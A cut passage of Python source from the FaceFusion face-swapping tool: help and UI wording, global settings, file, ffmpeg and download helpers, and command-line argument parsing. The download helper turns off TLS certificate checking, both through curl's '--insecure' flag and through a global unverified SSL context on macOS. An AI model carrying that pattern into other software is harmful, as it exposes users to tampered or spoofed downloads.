blur applied the box mask', 'face_mask_padding': 'apply top, right, bottom and left padding to the box mask', 'face_mask_regions': 'choose the facial features used for the region mask (choices: {choices})', # frame extraction 'trim_frame_start': 'specify the the start frame of the target video', 'trim_frame_end': 'specify the the end frame of the target video', 'temp_frame_format': 'specify the temporary resources format', 'keep_temp': 'keep the temporary resources after processing', # output creation 'output_image_quality': 'specify the image quality which translates to the compression factor', 'output_image_resolution': 'specify the image output resolution based on the target image', 'output_video_encoder': 'specify the encoder use for the video compression', 'output_video_preset': 'balance fast video processing and video file size', 'output_video_quality': 'specify the video quality which translates to the compression factor', 'output_video_resolution': 'specify the video output resolution based on the target video', 'output_video_fps': 'specify the video output fps based on the target video', 'skip_audio': 'omit the audio from the target video', # frame processors 'frame_processors': 'load a single or multiple frame processors. (choices: {choices}, ...)', 'face_debugger_items': 'load a single or multiple frame processors (choices: {choices})', 'face_enhancer_model': 'choose the model responsible for enhancing the face', 'face_enhancer_blend': 'blend the enhanced into the previous face', 'face_swapper_model': 'choose the model responsible for swapping the face', 'frame_colorizer_model': 'choose the model responsible for colorizing the frame', 'frame_colorizer_blend': 'blend the colorized into the previous frame', 'frame_colorizer_size': 'specify the size of the frame provided to the frame colorizer', 'frame_enhancer_model': 'choose the model responsible for enhancing the frame', 'frame_enhancer_blend': 'blend the enhanced into the previous frame', 'lip_syncer_model': 'choose the model responsible for syncing the lips', # uis 'open_browser': 'open the browser once the program is ready', 'ui_layouts': 'launch a single or multiple UI layouts (choices: {choices}, ...)' }, 'uis': { # general 'start_button': 'START', 'stop_button': 'STOP', 'clear_button': 'CLEAR', # about 'donate_button': 'DONATE', # benchmark 'benchmark_results_dataframe': 'BENCHMARK RESULTS', # benchmark options 'benchmark_runs_checkbox_group': 'BENCHMARK RUNS', 'benchmark_cycles_slider': 'BENCHMARK CYCLES', # common options 'common_options_checkbox_group': 'OPTIONS', # execution 'execution_providers_checkbox_group': 'EXECUTION PROVIDERS', # execution queue count 'execution_queue_count_slider': 'EXECUTION QUEUE COUNT', # execution thread count 'execution_thread_count_slider': 'EXECUTION THREAD COUNT', # face analyser 'face_analyser_order_dropdown': 'FACE ANALYSER ORDER', 'face_analyser_age_dropdown': 'FACE ANALYSER AGE', 'face_analyser_gender_dropdown': 'FACE ANALYSER GENDER', 'face_detector_model_dropdown': 'FACE DETECTOR MODEL', 'face_detector_size_dropdown': 'FACE DETECTOR SIZE', 'face_detector_score_slider': 'FACE DETECTOR SCORE', 'face_landmarker_score_slider': 'FACE LANDMARKER SCORE', # face masker 'face_mask_types_checkbox_group': 'FACE MASK TYPES', 'face_mask_blur_slider': 'FACE MASK BLUR', 'face_mask_padding_top_slider': 'FACE MASK PADDING TOP', 'face_mask_padding_right_slider': 'FACE MASK PADDING RIGHT', 'face_mask_padding_bottom_slider': 'FACE MASK PADDING BOTTOM', 'face_mask_padding_left_slider': 'FACE MASK PADDING LEFT', 'face_mask_region_checkbox_group': 'FACE MASK REGIONS', # face selector 'face_selector_mode_dropdown': 'FACE SELECTOR MODE', 'reference_face_gallery': 'REFERENCE FACE', 'reference_face_distance_slider': 'REFERENCE FACE DISTANCE', # frame processors 'frame_processors_checkbox_group': 'FRAME PROCESSORS', # frame processors options 'face_debugger_items_checkbox_group': 'FACE DEBUGGER ITEMS', 'face_enhancer_model_dropdown': 'FACE ENHANCER MODEL', 'face_enhancer_blend_slider': 'FACE ENHANCER BLEND', 'face_swapper_model_dropdown': 'FACE SWAPPER MODEL', 'frame_colorizer_model_dropdown': 'FRAME COLORIZER MODEL', 'frame_colorizer_blend_slider': 'FRAME COLORIZER BLEND', 'frame_colorizer_size_dropdown': 'FRAME COLORIZER SIZE', 'frame_enhancer_model_dropdown': 'FRAME ENHANCER MODEL', 'frame_enhancer_blend_slider': 'FRAME ENHANCER BLEND', 'lip_syncer_model_dropdown': 'LIP SYNCER MODEL', # memory 'video_memory_strategy_dropdown': 'VIDEO MEMORY STRATEGY', 'system_memory_limit_slider': 'SYSTEM MEMORY LIMIT', # output 'output_image_or_video': 'OUTPUT', # output options 'output_path_textbox': 'OUTPUT PATH', 'output_image_quality_slider': 'OUTPUT IMAGE QUALITY', 'output_image_resolution_dropdown': 'OUTPUT IMAGE RESOLUTION', 'output_video_encoder_dropdown': 'OUTPUT VIDEO ENCODER', 'output_video_preset_dropdown': 'OUTPUT VIDEO PRESET', 'output_video_quality_slider': 'OUTPUT VIDEO QUALITY', 'output_video_resolution_dropdown': 'OUTPUT VIDEO RESOLUTION', 'output_video_fps_slider': 'OUTPUT VIDEO FPS', # preview 'preview_image': 'PREVIEW', 'preview_frame_slider': 'PREVIEW FRAME', # source 'source_file': 'SOURCE', # target 'target_file': 'TARGET', # temp frame 'temp_frame_format_dropdown': 'TEMP FRAME FORMAT', # trim frame 'trim_frame_start_slider': 'TRIM FRAME START', 'trim_frame_end_slider': 'TRIM FRAME END', # webcam 'webcam_image': 'WEBCAM', # webcam options 'webcam_mode_radio': 'WEBCAM MODE', 'webcam_resolution_dropdown': 'WEBCAM RESOLUTION', 'webcam_fps_slider': 'WEBCAM FPS' } } def get(key : str) -> Optional[str]: if '.' in key: section, name = key.split('.') if section in WORDING and name in WORDING[section]: return WORDING[section][name] if key in WORDING: return WORDING[key] return None File: facefusion/globals.py from typing import List, Optional from facefusion.typing import LogLevel, VideoMemoryStrategy, FaceSelectorMode, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, FaceMaskType, FaceMaskRegion, OutputVideoEncoder, OutputVideoPreset, FaceDetectorModel, FaceRecognizerModel, TempFrameFormat, Padding # general config_path : Optional[str] = None source_paths : Optional[List[str]] = None target_path : Optional[str] = None output_path : Optional[str] = None # misc force_download : Optional[bool] = None skip_download : Optional[bool] = None headless : Optional[bool] = None log_level : Optional[LogLevel] = None # execution execution_device_id : Optional[str] = None execution_providers : List[str] = [] execution_thread_count : Optional[int] = None execution_queue_count : Optional[int] = None # memory video_memory_strategy : Optional[VideoMemoryStrategy] = None system_memory_limit : Optional[int] = None # face analyser face_analyser_order : Optional[FaceAnalyserOrder] = None face_analyser_age : Optional[FaceAnalyserAge] = None face_analyser_gender : Optional[FaceAnalyserGender] = None face_detector_model : Optional[FaceDetectorModel] = None face_detector_size : Optional[str] = None face_detector_score : Optional[float] = None face_landmarker_score : Optional[float] = None face_recognizer_model : Optional[FaceRecognizerModel] = None # face selector face_selector_mode : Optional[FaceSelectorMode] = None reference_face_position : Optional[int] = None reference_face_distance : Optional[float] = None reference_frame_number : Optional[int] = None # face mask face_mask_types : Optional[List[FaceMaskType]] = None face_mask_blur : Optional[float] = None face_mask_padding : Optional[Padding] = None face_mask_regions : Optional[List[FaceMaskRegion]] = None # frame extraction trim_frame_start : Optional[int] = None trim_frame_end : Optional[int] = None temp_frame_format : Optional[TempFrameFormat] = None keep_temp : Optional[bool] = None # output creation output_image_quality : Optional[int] = None output_image_resolution : Optional[str] = None output_video_encoder : Optional[OutputVideoEncoder] = None output_video_preset : Optional[OutputVideoPreset] = None output_video_quality : Optional[int] = None output_video_resolution : Optional[str] = None output_video_fps : Optional[float] = None skip_audio : Optional[bool] = None # frame processors frame_processors : List[str] = [] # uis open_browser : Optional[bool] = None ui_layouts : List[str] = [] File: facefusion/download.py import os import subprocess import ssl import urllib.request from typing import List from functools import lru_cache from tqdm import tqdm import facefusion.globals from facefusion import wording from facefusion.common_helper import is_macos from facefusion.filesystem import get_file_size, is_file if is_macos(): ssl._create_default_https_context = ssl._create_unverified_context def conditional_download(download_directory_path : str, urls : List[str]) -> None: for url in urls: download_file_path = os.path.join(download_directory_path, os.path.basename(url)) initial_size = get_file_size(download_file_path) download_size = get_download_size(url) if initial_size < download_size: with tqdm(total = download_size, initial = initial_size, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024, ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: subprocess.Popen([ 'curl', '--create-dirs', '--silent', '--insecure', '--location', '--continue-at', '-', '--output', download_file_path, url ]) current_size = initial_size while current_size < download_size: if is_file(download_file_path): current_size = get_file_size(download_file_path) progress.update(current_size - progress.n) if download_size and not is_download_done(url, download_file_path): os.remove(download_file_path) conditional_download(download_directory_path, [ url ]) @lru_cache(maxsize = None) def get_download_size(url : str) -> int: try: response = urllib.request.urlopen(url, timeout = 10) return int(response.getheader('Content-Length')) except (OSError, ValueError): return 0 def is_download_done(url : str, file_path : str) -> bool: if is_file(file_path): return get_download_size(url) == get_file_size(file_path) return False File: facefusion/filesystem.py from typing import List, Optional import glob import os import shutil import tempfile import filetype from pathlib import Path import facefusion.globals from facefusion.common_helper import is_windows if is_windows(): import ctypes def get_temp_frame_paths(target_path : str) -> List[str]: temp_frames_pattern = get_temp_frames_pattern(target_path, '*') return sorted(glob.glob(temp_frames_pattern)) def get_temp_frames_pattern(target_path : str, temp_frame_prefix : str) -> str: temp_directory_path = get_temp_directory_path(target_path) return os.path.join(temp_directory_path, temp_frame_prefix + '.' + facefusion.globals.temp_frame_format) def get_temp_file_path(target_path : str) -> str: _, target_extension = os.path.splitext(os.path.basename(target_path)) temp_directory_path = get_temp_directory_path(target_path) return os.path.join(temp_directory_path, 'temp' + target_extension) def get_temp_directory_path(target_path : str) -> str: target_name, _ = os.path.splitext(os.path.basename(target_path)) temp_directory_path = os.path.join(tempfile.gettempdir(), 'facefusion') return os.path.join(temp_directory_path, target_name) def create_temp(target_path : str) -> None: temp_directory_path = get_temp_directory_path(target_path) Path(temp_directory_path).mkdir(parents = True, exist_ok = True) def move_temp(target_path : str, output_path : str) -> None: temp_file_path = get_temp_file_path(target_path) if is_file(temp_file_path): if is_file(output_path): os.remove(output_path) shutil.move(temp_file_path, output_path) def clear_temp(target_path : str) -> None: temp_directory_path = get_temp_directory_path(target_path) parent_directory_path = os.path.dirname(temp_directory_path) if not facefusion.globals.keep_temp and is_directory(temp_directory_path): shutil.rmtree(temp_directory_path, ignore_errors = True) if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): os.rmdir(parent_directory_path) def get_file_size(file_path : str) -> int: if is_file(file_path): return os.path.getsize(file_path) return 0 def is_file(file_path : str) -> bool: return bool(file_path and os.path.isfile(file_path)) def is_directory(directory_path : str) -> bool: return bool(directory_path and os.path.isdir(directory_path)) def is_audio(audio_path : str) -> bool: return is_file(audio_path) and filetype.helpers.is_audio(audio_path) def has_audio(audio_paths : List[str]) -> bool: if audio_paths: return any(is_audio(audio_path) for audio_path in audio_paths) return False def is_image(image_path : str) -> bool: return is_file(image_path) and filetype.helpers.is_image(image_path) def has_image(image_paths: List[str]) -> bool: if image_paths: return any(is_image(image_path) for image_path in image_paths) return False def is_video(video_path : str) -> bool: return is_file(video_path) and filetype.helpers.is_video(video_path) def filter_audio_paths(paths : List[str]) -> List[str]: if paths: return [ path for path in paths if is_audio(path) ] return [] def filter_image_paths(paths : List[str]) -> List[str]: if paths: return [ path for path in paths if is_image(path) ] return [] def resolve_relative_path(path : str) -> str: return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) def list_directory(directory_path : str) -> Optional[List[str]]: if is_directory(directory_path): files = os.listdir(directory_path) files = [ Path(file).stem for file in files if not Path(file).stem.startswith(('.', '__')) ] return sorted(files) return None def sanitize_path_for_windows(full_path : str) -> Optional[str]: buffer_size = 0 while True: unicode_buffer = ctypes.create_unicode_buffer(buffer_size) buffer_threshold = ctypes.windll.kernel32.GetShortPathNameW(full_path, unicode_buffer, buffer_size) #type:ignore[attr-defined] if buffer_size > buffer_threshold: return unicode_buffer.value if buffer_threshold == 0: return None buffer_size = buffer_threshold File: facefusion/ffmpeg.py from typing import List, Optional import os import subprocess import filetype import facefusion.globals from facefusion import logger, process_manager from facefusion.typing import OutputVideoPreset, Fps, AudioBuffer from facefusion.filesystem import get_temp_frames_pattern, get_temp_file_path from facefusion.vision import restrict_video_fps def run_ffmpeg(args : List[str]) -> bool: commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] commands.extend(args) process = subprocess.Popen(commands, stderr = subprocess.PIPE, stdout = subprocess.PIPE) while process_manager.is_processing(): try: if facefusion.globals.log_level == 'debug': log_debug(process) return process.wait(timeout = 0.5) == 0 except subprocess.TimeoutExpired: continue return process.returncode == 0 def open_ffmpeg(args : List[str]) -> subprocess.Popen[bytes]: commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'quiet' ] commands.extend(args) return subprocess.Popen(commands, stdin = subprocess.PIPE, stdout = subprocess.PIPE) def log_debug(process : subprocess.Popen[bytes]) -> None: _, stderr = process.communicate() errors = stderr.decode().split(os.linesep) for error in errors: if error.strip(): logger.debug(error.strip(), __name__.upper()) def extract_frames(target_path : str, temp_video_resolution : str, temp_video_fps : Fps) -> bool: trim_frame_start = facefusion.globals.trim_frame_start trim_frame_end = facefusion.globals.trim_frame_end temp_frames_pattern = get_temp_frames_pattern(target_path, '%04d') commands = [ '-i', target_path, '-s', str(temp_video_resolution), '-q:v', '0' ] if trim_frame_start is not None and trim_frame_end is not None: commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ':end_frame=' + str(trim_frame_end) + ',fps=' + str(temp_video_fps) ]) elif trim_frame_start is not None: commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(temp_video_fps) ]) elif trim_frame_end is not None: commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(temp_video_fps) ]) else: commands.extend([ '-vf', 'fps=' + str(temp_video_fps) ]) commands.extend([ '-vsync', '0', temp_frames_pattern ]) return run_ffmpeg(commands) def merge_video(target_path : str, output_video_resolution : str, output_video_fps : Fps) -> bool: temp_video_fps = restrict_video_fps(target_path, output_video_fps) temp_file_path = get_temp_file_path(target_path) temp_frames_pattern = get_temp_frames_pattern(target_path, '%04d') commands = [ '-r', str(temp_video_fps), '-i', temp_frames_pattern, '-s', str(output_video_resolution), '-c:v', facefusion.globals.output_video_encoder ] if facefusion.globals.output_video_encoder in [ 'libx264', 'libx265' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-crf', str(output_video_compression), '-preset', facefusion.globals.output_video_preset ]) if facefusion.globals.output_video_encoder in [ 'libvpx-vp9' ]: output_video_compression = round(63 - (facefusion.globals.output_video_quality * 0.63)) commands.extend([ '-crf', str(output_video_compression) ]) if facefusion.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-cq', str(output_video_compression), '-preset', map_nvenc_preset(facefusion.globals.output_video_preset) ]) if facefusion.globals.output_video_encoder in [ 'h264_amf', 'hevc_amf' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-qp_i', str(output_video_compression), '-qp_p', str(output_video_compression), '-quality', map_amf_preset(facefusion.globals.output_video_preset) ]) commands.extend([ '-vf', 'framerate=fps=' + str(output_video_fps), '-pix_fmt', 'yuv420p', '-colorspace', 'bt709', '-y', temp_file_path ]) return run_ffmpeg(commands) def copy_image(target_path : str, temp_image_resolution : str) -> bool: temp_file_path = get_temp_file_path(target_path) is_webp = filetype.guess_mime(target_path) == 'image/webp' temp_image_compression = 100 if is_webp else 0 commands = [ '-i', target_path, '-s', str(temp_image_resolution), '-q:v', str(temp_image_compression), '-y', temp_file_path ] return run_ffmpeg(commands) def finalize_image(target_path : str, output_path : str, output_image_resolution : str) -> bool: temp_file_path = get_temp_file_path(target_path) output_image_compression = round(31 - (facefusion.globals.output_image_quality * 0.31)) commands = [ '-i', temp_file_path, '-s', str(output_image_resolution), '-q:v', str(output_image_compression), '-y', output_path ] return run_ffmpeg(commands) def read_audio_buffer(target_path : str, sample_rate : int, channel_total : int) -> Optional[AudioBuffer]: commands = [ '-i', target_path, '-vn', '-f', 's16le', '-acodec', 'pcm_s16le', '-ar', str(sample_rate), '-ac', str(channel_total), '-'] process = open_ffmpeg(commands) audio_buffer, _ = process.communicate() if process.returncode == 0: return audio_buffer return None def restore_audio(target_path : str, output_path : str, output_video_fps : Fps) -> bool: trim_frame_start = facefusion.globals.trim_frame_start trim_frame_end = facefusion.globals.trim_frame_end temp_file_path = get_temp_file_path(target_path) commands = [ '-i', temp_file_path ] if trim_frame_start is not None: start_time = trim_frame_start / output_video_fps commands.extend([ '-ss', str(start_time) ]) if trim_frame_end is not None: end_time = trim_frame_end / output_video_fps commands.extend([ '-to', str(end_time) ]) commands.extend([ '-i', target_path, '-c', 'copy', '-map', '0:v:0', '-map', '1:a:0', '-shortest', '-y', output_path ]) return run_ffmpeg(commands) def replace_audio(target_path : str, audio_path : str, output_path : str) -> bool: temp_file_path = get_temp_file_path(target_path) commands = [ '-i', temp_file_path, '-i', audio_path, '-af', 'apad', '-shortest', '-y', output_path ] return run_ffmpeg(commands) def map_nvenc_preset(output_video_preset : OutputVideoPreset) -> Optional[str]: if output_video_preset in [ 'ultrafast', 'superfast', 'veryfast', 'faster', 'fast' ]: return 'fast' if output_video_preset == 'medium': return 'medium' if output_video_preset in [ 'slow', 'slower', 'veryslow' ]: return 'slow' return None def map_amf_preset(output_video_preset : OutputVideoPreset) -> Optional[str]: if output_video_preset in [ 'ultrafast', 'superfast', 'veryfast' ]: return 'speed' if output_video_preset in [ 'faster', 'fast', 'medium' ]: return 'balanced' if output_video_preset in [ 'slow', 'slower', 'veryslow' ]: return 'quality' return None File: facefusion/__init__.py File: facefusion/common_helper.py from typing import List, Any import platform def create_metavar(ranges : List[Any]) -> str: return '[' + str(ranges[0]) + '-' + str(ranges[-1]) + ']' def create_int_range(start : int, end : int, step : int) -> List[int]: int_range = [] current = start while current <= end: int_range.append(current) current += step return int_range def create_float_range(start : float, end : float, step : float) -> List[float]: float_range = [] current = start while current <= end: float_range.append(round(current, 2)) current = round(current + step, 2) return float_range def is_linux() -> bool: return to_lower_case(platform.system()) == 'linux' def is_macos() -> bool: return to_lower_case(platform.system()) == 'darwin' def is_windows() -> bool: return to_lower_case(platform.system()) == 'windows' def to_lower_case(__string__ : Any) -> str: return str(__string__).lower() def get_first(__list__ : Any) -> Any: return next(iter(__list__), None) File: facefusion/core.py import os os.environ['OMP_NUM_THREADS'] = '1' import signal import sys import warnings import shutil import numpy import onnxruntime from time import sleep, time from argparse import ArgumentParser, HelpFormatter import facefusion.choices import facefusion.globals from facefusion.face_analyser import get_one_face, get_average_face from facefusion.face_store import get_reference_faces, append_reference_face from facefusion import face_analyser, face_masker, content_analyser, config, process_manager, metadata, logger, wording, voice_extractor from facefusion.content_analyser import analyse_image, analyse_video from facefusion.processors.frame.core import get_frame_processors_modules, load_frame_processor_module from facefusion.common_helper import create_metavar, get_first from facefusion.execution import encode_execution_providers, decode_execution_providers from facefusion.normalizer import normalize_output_path, normalize_padding, normalize_fps from facefusion.memory import limit_system_memory from facefusion.statistics import conditional_log_statistics from facefusion.download import conditional_download from facefusion.filesystem import get_temp_frame_paths, get_temp_file_path, create_temp, move_temp, clear_temp, is_image, is_video, filter_audio_paths, resolve_relative_path, list_directory from facefusion.ffmpeg import extract_frames, merge_video, copy_image, finalize_image, restore_audio, replace_audio from facefusion.vision import read_image, read_static_images, detect_image_resolution, restrict_video_fps, create_image_resolutions, get_video_frame, detect_video_resolution, detect_video_fps, restrict_video_resolution, restrict_image_resolution, create_video_resolutions, pack_resolution, unpack_resolution onnxruntime.set_default_logger_severity(3) warnings.filterwarnings('ignore', category = UserWarning, module = 'gradio') def cli() -> None: signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) program = ArgumentParser(formatter_class = lambda prog: HelpFormatter(prog, max_help_position = 200), add_help = False) # general program.add_argument('-c', '--config', help = wording.get('help.config'), dest = 'config_path', default = 'facefusion.ini') apply_config(program) program.add_argument('-s', '--source', help = wording.get('help.source'), action = 'append', dest = 'source_paths', default = config.get_str_list('general.source_paths')) program.add_argument('-t', '--target', help = wording.get('help.target'), dest = 'target_path', default = config.get_str_value('general.target_path')) program.add_argument('-o', '--output', help = wording.get('help.output'), dest = 'output_path', default = config.get_str_value('general.output_path')) program.add_argument('-v', '--version', version = metadata.get('name') + ' ' + metadata.get('version'), action = 'version') # misc group_misc = program.add_argument_group('misc') group_misc.add_argument('--force-download', help = wording.get('help.force_download'), action = 'store_true', default = config.get_bool_value('misc.force_download')) group_misc.add_argument('--skip-download', help = wording.get('help.skip_download'), action = 'store_true', default = config.get_bool_value('misc.skip_download')) group_misc.add_argument('--headless', help = wording.get('help.headless'), action = 'store_true', default = config.get_bool_value('misc.headless')) group_misc.add_argument('--log-level', help = wording.get('help.log_level'), default = config.get_str_value('misc.log_level', 'info'), choices = logger.get_log_levels()) # execution execution_providers = encode_execution_providers(onnxruntime.get_available_providers()) group_execution = program.add_argument_group('execution') group_execution.add_argument('--execution-device-id', help = wording.get('help.execution_device_id'), default = config.get_str_value('execution.face_detector_size', '0')) group_execution.add_argument('--execution-providers', help = wording.get('help.execution_providers').format(choices = ', '.join(execution_providers)), default = config.get_str_list('execution.execution_providers', 'cpu'), choices = execution_providers, nargs = '+', metavar = 'EXECUTION_PROVIDERS') group_execution.add_argument('--execution-thread-count', help = wording.get('help.execution_thread_count'), type = int, default = config.get_int_value('execution.execution_thread_count', '4'), choices = facefusion.choices.execution_thread_count_range, metavar = create_metavar(facefusion.choices.execution_thread_count_range)) group_execution.add_argument('--execution-queue-count', help = wording.get('help.execution_queue_count'), type = int, default = config.get_int_value('execution.execution_queue_count', '1'), choices = facefusion.choices.execution_queue_count_range, metavar = create_metavar(facefusion.choices.execution_queue_count_range)) # memory group_memory = program.add_argument_group('memory') group_memory.add_argument('--video-memory-strategy', help = wording.get('help.video_memory_strategy'), default = config.get_str_value('memory.video_memory_strategy', 'strict'), choices = facefusion.choices.video_memory_strategies) group_memory.add_argument('--system-memory-limit', help = wording.get('help.system_memory_limit'), type = int, default = config.get_int_value('memory.system_memory_limit', '0'), choices = facefusion.choices.system_memory_limit_range, metavar = create_metavar(facefusion.choices.system_memory_limit_range)) # face analyser group_face_analyser = program.add_argument_group('face analyser') group_face_analyser.add_argument('--face-analyser-order', help = wording.get('help.face_analyser_order'), default = config.get_str_value('face_analyser.face_analyser_order', 'left-right'), choices = facefusion.choices.face_analyser_orders) group_face_analyser.add_argument('--face-analyser-age', help = wording.get('help.face_analyser_age'), default = config.get_str_value('face_analyser.face_analyser_age'), choices = facefusion.choices.face_analyser_ages) group_face_analyser.add_argument('--face-analyser-gender', help = wording.get('help.face_analyser_gender'), default = config.get_str_value('face_analyser.face_analyser_gender'), choices = facefusion.choices.face_analyser_genders) group_face_analyser.add_argument('--face-detector-model', help = wording.get('help.face_detector_model'), default = config.get_str_value('face_analyser.face_detector_model', 'yoloface'), choices = facefusion.choices.face_detector_set.keys()) group_face_analyser.add_argument('--face-detector-size', help = wording.get('help.face_detector_size'), default = config.get_str_value('face_analyser.face_detector_size', '640x640')) group_face_analyser.add_argument('--face-detector-score', help = wording.get('help.face_detector_score'), type = float, default = config.get_float_value('face_analyser.face_detector_score', '0.5'), choices = facefusion.choices.face_detector_score_range, metavar = create_metavar(facefusion.choices.face_detector_score_range)) group_face_analyser.add_argument('--face-landmarker-score', help = wording.get('help.face_landmarker_score'), type = float, default = config.get_float_value('face_analyser.face_landmarker_score', '0.5'), choices = facefusion.choices.face_landmarker_score_range, metavar = create_metavar(facefusion.choices.face_landmarker_score_range)) # face selector group_face_selector = program.add_argument_group('face selector') group_face_selector.add_argument('--face-selector-mode', help = wording.get('help.face_selector_mode'), default = config.get_str_value('face_selector.face_selector_mode', 'reference'), choices = facefusion.choices.face_selector_modes) group_face_selector.add_argument('--reference-face-position', help = wording.get('help.reference_face_position'), type = int, default = config.get_int_value('face_selector.reference_face_position', '0')) group_face_selector.add_argument('--reference-face-distance', help = wording.get('help.reference_face_distance'), type = float, default = config.get_float_value('face_selector.reference_face_distance', '0.6'), choices = facefusion.choices.reference_face_distance_range, metavar = create_metavar(facefusion.choices.reference_face_distance_range)) group_face_selector.add_argument('--reference-frame-number', help = wording.get('help.reference_frame_number'), type = int, default = config.get_int_value('face_selector.reference_frame_number', '0')) # face mask group_face_mask = program.add_argument_group('face mask') group_face_mask.add_argument('--face-mask-types', help = wording.get('help.face_mask_types').format(choices = ', '.join(facefusion.choices.face_mask_types)), default = config.get_str_list('face_mask.face_mask_types', 'box'), choices = facefusion.choices.face_mask_types, nargs = '+', metavar = 'FACE_MASK_TYPES') group_face_mask.add_argument('--face-mask-blur', help = wording.get('help.face_mask_blur'), type = float, default = config.get_float_value('face_mask.face_mask_blur', '0.3'), choices = facefusion.choices.face_mask_blur_range, metavar = create_metavar(facefusion.choices.face_mask_blur_range)) group_face_mask.add_argument('--face-mask-padding', help = wording.get('help.face_mask_padding'), type = int, default = config.get_int_list('face_mask.face_mask_padding', '0 0 0 0'), nargs = '+') group_face_mask.add_argument('--face-mask-regions', help = wording.get('help.face_mask_regions').format(choices = ', '.join(facefusion.choices.face_mask_regions)), default = config.get_str_list('face_mask.face_mask_regions', ' '.join(facefusion.choices.face_mask_regions)), choices = facefusion.choices.face_mask_regions, nargs = '+', metavar = 'FACE_MASK_REGIONS') # frame extraction group_frame_extraction = program.add_argument_group('frame extraction') group_frame_extraction.add_argument('--trim-frame-start', help = wording.get('help.trim_frame_start'), type = int, default = facefusion.config.get_int_value('frame_extraction.trim_frame_start')) group_frame_extraction.add_argument('--trim-frame-end', help = wording.get('help.trim_frame_end'), type = int, default = facefusion.config.get_int_value('frame_extraction.trim_frame_end')) group_frame_extraction.add_argument('--temp-frame-format', help = wording.get('help.temp_frame_format'), default = config.get_str_value('frame_extraction.temp_frame_format', 'png'), choices = facefusion.choices.temp_frame_formats) group_frame_extraction.add_argument('--keep-temp', help = wording.get('help.keep_temp'), action = 'store_true', default = config.get_bool_value('frame_extraction.keep_temp')) # output creation group_output_creation = program.add_argument_group('output creation') group_output_creation.add_argument('--output-image-quality', help = wording.get('help.output_image_quality'), type = int, default = config.get_int_value('output_creation.output_image_quality', '80'), choices = facefusion.choices.output_image_quality_range, metavar = create_metavar(facefusion.choices.output_image_quality_range)) group_output_creation.add_argument('--output-image-resolution', help = wording.get('help.output_image_resolution'), default = config.get_str_value('output_creation.output_image_resolution')) group_output_creation.add_argument('--output-video-encoder', help = wording.get('help.output_video_encoder'), default = config.get_str_value('output_creation.output_video_encoder', 'libx264'), choices = facefusion.choices.output_video_encoders) group_output_creation.add_argument('--output-video-preset', help = wording.get('help.output_video_preset'), default = config.get_str_value('output_creation.output_video_preset', 'veryfast'), choices = facefusion.choices.output_video_presets) group_output_creation.add_argument('--output-video-quality', help = wording.get('help.output_video_quality'), type = int, default = config.get_int_value('output_creation.output_video_quality', '80'), choices = facefusion.choices.output_video_quality_range, metavar = create_metavar(facefusion.choices.output_video_quality_range)) group_output_creation.add_argument('--output-video-resolution', help = wording.get('help.output_video_resolution'), default = config.get_str_value('output_creation.output_video_resolution')) group_output_creation.add_argument('--output-video-fps', help = wording.get('help.output_video_fps'), type = float, default = config.get_str_value('output_creation.output_video_fps')) group_output_creation.add_argument('--skip-audio', help = wording.get('help.skip_audio'), action = 'store_true', default = config.get_bool_value('output_creation.skip_audio')) # frame processors available_frame_processors = list_directory('facefusion/processors/frame/modules') program = ArgumentParser(parents = [ program ], formatter_class = program.formatter_class, add_help = True) group_frame_processors = program.add_argument_group('frame processors') group_frame_processors.add_argument('--frame-processors', help = wording.get('help.frame_processors').format(choices = ', '.join(available_frame_processors)), default = config.get_str_list('frame_processors.frame_processors', 'face_swapper'), nargs = '+') for frame_processor in available_frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) frame_processor_module.register_args(group_frame_processors) # uis available_ui_layouts = list_directory('facefusion/uis/layouts') group_uis = program.add_argument_group('uis') group_uis.add_argument('--open-browser', help=wording.get('help.open_browser'), action = 'store_true', default = config.get_bool_value('uis.open_browser')) group_uis.add_argument('--ui-layouts', help = wording.get('help.ui_layouts').format(choices = ', '.join(available_ui_layouts)), default = config.get_str_list('uis.ui_layouts', 'default'), nargs = '+') run(program) def apply_config(program : ArgumentParser) -> None: known_args = program.parse_known_args() facefusion.globals.config_path = get_first(known_args).config_path def validate_args(program : ArgumentParser) -> None: try: for action in program._actions: if action.default: if isinstance(action.default, list): for default in action.default: program._check_value(action, default) else: program._check_value(action, action.default) except Exception as exception: program.error(str(exception)) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() # general facefusion.globals.source_paths = args.source_paths facefusion.globals.target_path = args.target_path facefusion.globals.output_path = args.output_path # misc facefusion.globals.force_download = args.force_download facefusion.globals.skip_download = args.skip_download facefusion.globals.headless = args.headless facefusion.globals.log_level = args.log_level # execution facefusion.globals.execution_device_id = args.execution_device_id facefusion.globals.execution_providers = decode_execution_providers(args.execution_providers) facefusion.globals.execution_thread_count = args.execution_thread_count facefusion.globals.execution_queue_count = args.execution_queue_count # memory facefusion.globals.video_memory_strategy = args.video_memory_strategy facefusion.globals.system_memory_limit = args.system_memory_limit # face analyser facefusion.globals.face_analyser_order = args.face_analyser_order facefusion.globals.face_analyser_age = args.face_analyser_age facefusion.globals.face_analyser_gender = args.face_analyser_gender facefusion.globals.face_detector_model = args.face_detector_model if args.face_detector_size in facefusion.choices.face_detector_set[args.face_detector_model]: facefusion.globals.face_detector_size = args.face_detector_size else: facefusion.globals.face_detector_size = '640x640' facefusion.globals.face_detector_score = args.face_detector_score facefusion.globals.face_landmarker_score = args.face_landmarker_score # face selector facefusion.globals.face_selector_mode = args.face_selector_mode facefusion.globals.reference_face_position = args.reference_face_position facefusion.globals.reference_face_distance = args.reference_face_distance facefusion.globals.reference_frame_number = args.reference_frame_number # face mask facefusion.globals.face_mask_types = args.face_mask_types 